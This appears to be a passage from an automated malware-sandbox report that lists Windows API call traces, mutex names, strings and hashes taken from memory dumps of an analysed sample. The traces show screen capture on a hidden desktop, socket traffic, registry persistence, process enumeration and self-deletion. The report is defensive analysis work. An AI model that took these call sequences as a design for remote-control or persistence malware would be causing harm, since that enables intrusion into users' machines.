                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BCFEAC
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BCFEB5
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCFEC9
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCFEDB
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C774), ref: 02BCFEE6
                                                                                                                                                                                                            • Sleep.KERNEL32(00009C40,02C0C774,HANDY), ref: 02BCFF00
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 02BCFF06
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • HANDY, xrefs: 02BCFEEC
                                                                                                                                                                                                            • Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02BCFEA0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                            • String ID: HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,02BBFCE7,00000000,?,02BBFCE7,,-057FF5C8,00000000,00000000,02BBFCE7,?), ref: 02BBF0CD
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: callocexitfree
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WindowFromDC.USER32(?), ref: 02BBC31C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBC354
                                                                                                                                                                                                            • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02BBC362
                                                                                                                                                                                                            • GetClipRgn.GDI32(?,00000000), ref: 02BBC36C
                                                                                                                                                                                                            • SelectClipRgn.GDI32(00000000,00000000), ref: 02BBC37C
                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 02BBC383
                                                                                                                                                                                                            • GetViewportOrgEx.GDI32(?,?), ref: 02BBC38E
                                                                                                                                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02BBC3A2
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000), ref: 02BBC3E3
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3315380975-0
                                                                                                                                                                                                            • Opcode ID: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                            • Instruction ID: 4beef16bbd8e3095bc5a758c7a560748fc3b2c91fc9631c2ab5733f262eff743
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e08055e1d9b8f15b94b1078f0f9eabf9d581e1c3c6ff677bd255dd42d2406790
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FF41FCB6641105AFCB64CF69DC84EAB77BDEF8C751B508609FA19D3240D670E850CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2787354276-0
                                                                                                                                                                                                            • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                            • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SetThreadDesktop.USER32(?), ref: 02BB9350
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8F3A
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F49
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteDC.GDI32(00000000), ref: 02BB8F57
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8F67
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F6F
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: DeleteDC.GDI32(?), ref: 02BB8F78
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: GetDC.USER32(00000000), ref: 02BB8F7C
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F8B
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F93
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FB4
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8FC3
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FDE
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8FFD
                                                                                                                                                                                                              • Part of subcall function 02BB8F20: ReleaseDC.USER32(00000000,00000000), ref: 02BB900C
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02BB937C
                                                                                                                                                                                                            • GetTopWindow.USER32(00000000), ref: 02BB938B
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB939E
                                                                                                                                                                                                            • GetWindow.USER32(00000000,00000005), ref: 02BB93B4
                                                                                                                                                                                                            • GetWindow.USER32(00000000), ref: 02BB93B7
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,00000000), ref: 02BB93C6
                                                                                                                                                                                                            • SetEvent.KERNEL32(00000000), ref: 02BB93CF
                                                                                                                                                                                                            • Sleep.KERNEL32(00000032), ref: 02BB93DB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 4064958368-0
                                                                                                                                                                                                            • Opcode ID: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                            • Instruction ID: ef8b85a6af4b34403e0eae7e694e3c698f7b79f1021d6453180773febc04cb90
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5115E75980205ABCA60AB79ECCCE6B37ACAB447907008E04B312872D5DAB4FC10CF60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,75B8E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,75B8E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2629017576-0
                                                                                                                                                                                                            • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                            • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsWindowVisible.USER32(02BBD21D), ref: 02BBCAAF
                                                                                                                                                                                                            • GetWindowInfo.USER32(02BBD21D,?), ref: 02BBCAC9
                                                                                                                                                                                                            • GetClassLongA.USER32(02BBD21D,000000E6), ref: 02BBCB1E
                                                                                                                                                                                                            • PrintWindow.USER32(02BBD21D,?,00000000), ref: 02BBCB37
                                                                                                                                                                                                            • BitBlt.GDI32(02BBCD02,?,?,?,?,753DBCB0,00000000,00000000,00CC0020), ref: 02BBCBDE
                                                                                                                                                                                                              • Part of subcall function 02BBDCE0: GetClassNameA.USER32(?,?,00000101), ref: 02BBDCF6
                                                                                                                                                                                                              • Part of subcall function 02BBC8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 02BBC8F8
                                                                                                                                                                                                              • Part of subcall function 02BBC8D0: GdiFlush.GDI32(00000000,?,02BBC9F1,00000000,?), ref: 02BBC90E
                                                                                                                                                                                                              • Part of subcall function 02BBC8D0: BitBlt.GDI32(02BBC9F1,00000000,00000000,?,02BBC9F1,?,00000000,00000000,00CC0020), ref: 02BBC934
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                            • String ID: <$@J=u
                                                                                                                                                                                                            • API String ID: 2334662925-1520792215
                                                                                                                                                                                                            • Opcode ID: a7c8c29dce4c9cf03e25e1677f4eae2ef7a6c31e9cdc45d25ac699b5dc9156fc
                                                                                                                                                                                                            • Instruction ID: db58c8c76d02ac0d3a73afb1a695c5b745e578af8de367ce0ebe5a4d7ef6bbc4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c8c29dce4c9cf03e25e1677f4eae2ef7a6c31e9cdc45d25ac699b5dc9156fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 49414B71E00519AFCB29CF98C884AFEFBBAFF44354F55859AE405E3640DBB0A951CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • send.WS2_32(?,02BF9E44,00000002,00000000), ref: 02BC9A2A
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9A4E
                                                                                                                                                                                                            • recv.WS2_32(?,00000001,?,00000000), ref: 02BC9A7C
                                                                                                                                                                                                            • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9AA0
                                                                                                                                                                                                            • recv.WS2_32(?,?,?,00000000), ref: 02BC9AC5
                                                                                                                                                                                                            • lstrcmpA.KERNEL32(02BFFCA8,00000001,?,00000000), ref: 02BC9AED
                                                                                                                                                                                                            • lstrcmpA.KERNEL32(02BFFBA0,?,?,00000000), ref: 02BC9AFF
                                                                                                                                                                                                            • send.WS2_32(?,02BF9E48,00000002,00000000), ref: 02BC9B0E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: recv$lstrcmpsend
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1090895577-0
                                                                                                                                                                                                            • Opcode ID: 1161220944b3bc6f35c065c570529cf477afc2d7e7bad474c683c61b2c0db2db
                                                                                                                                                                                                            • Instruction ID: 4c6184e537029339c54367f6f1a66f9885a59fa3fa3ceffc68d95c872a7c63e6
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1161220944b3bc6f35c065c570529cf477afc2d7e7bad474c683c61b2c0db2db
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 54317D71A4475D39FB2196644C41FFFB76C9B85700F1042C5F74497182D3B15A4A8BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9C41
                                                                                                                                                                                                            • MapVirtualKeyW.USER32(00000000,00000000), ref: 02BB9C5F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D2F
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D51
                                                                                                                                                                                                            • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02BB9D98
                                                                                                                                                                                                            • SendMessageW.USER32(?,?,00000003,00000000), ref: 02BB9DBE
                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,?,?), ref: 02BB9DCB
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3783495248-0
                                                                                                                                                                                                            • Opcode ID: 52189b05ec55b5cacffad598d65684f0e5e0d1eef0209be64df062952523c0e0
                                                                                                                                                                                                            • Instruction ID: 0bd94dd470583f18444364c3bf1778933e6126b543566baf1e43671aa361e62c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52189b05ec55b5cacffad598d65684f0e5e0d1eef0209be64df062952523c0e0
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE514932A44684EAD722CF29A848BF53BD0DF43365F0845C9EB918B2D3C3B99555CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A60
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A8C
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5AB3
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB5AD4
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000388,000003E8), ref: 02BB5B04
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000388), ref: 02BB5B25
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB5B3E
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2971961948-0
                                                                                                                                                                                                            • Opcode ID: e60a4c4affec8569e5545540b7ea6ef97377c587876922c35dd4f04ec26028c8
                                                                                                                                                                                                            • Instruction ID: 0549f9420ea0217df0aba14b3a7f9bde85f29d6c88d2419e604151d1a953be39
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e60a4c4affec8569e5545540b7ea6ef97377c587876922c35dd4f04ec26028c8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B41E7B1D40208AFDB51DFA9D880AEDBBF5FF48311F94416AE904F7200E770AA018FA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BB5B68
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5B99
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BC5
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BEC
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000388,000003E8), ref: 02BB5C1D
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000388), ref: 02BB5C3E
                                                                                                                                                                                                            • SetLastError.KERNEL32(?), ref: 02BB5C48
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2971961948-0
                                                                                                                                                                                                            • Opcode ID: 1171e5cc5449a88869ce7b05bb0c6bba11cca1357e18e27b71f94175c1e8e749
                                                                                                                                                                                                            • Instruction ID: bd57f18481b553a7f84f78858f3179707275931cedb297bae45731c75c77d53e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1171e5cc5449a88869ce7b05bb0c6bba11cca1357e18e27b71f94175c1e8e749
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C311CB1E40208EFDB90DFA8D884AEDBBF5FF48311F54856AE518E7200E77099018FA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBB8F
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBBB
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBE2
                                                                                                                                                                                                            • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02BBBC11
                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,69889606a), ref: 02BBBC27
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                            • String ID: 69889606a
                                                                                                                                                                                                            • API String ID: 410342393-3166098420
                                                                                                                                                                                                            • Opcode ID: 5868db8f9e9c25e2658847fe7c1233b7b7c21dfd1d385b52e10c793a36452b77
                                                                                                                                                                                                            • Instruction ID: 6f6542b5f4a3f5f1b5f3fb12c1d02fc80a48ba2dd7e692181701aeb792ef5cbd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5868db8f9e9c25e2658847fe7c1233b7b7c21dfd1d385b52e10c793a36452b77
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C31C9B1E4020DAFDB50DFA9D885AEEBBF4FB48705F50806AE508E7240E7745A55CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD4C14
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD4C1F
                                                                                                                                                                                                            • Process32First.KERNEL32 ref: 02BD4C45
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,?), ref: 02BD4C60
                                                                                                                                                                                                            • Process32Next.KERNEL32(00000000,?), ref: 02BD4C6C
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4C88
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD4C9A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3955875343-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02BC18AD
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(-80000001,698893E4a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02BC18CF
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18DD
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18F0
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
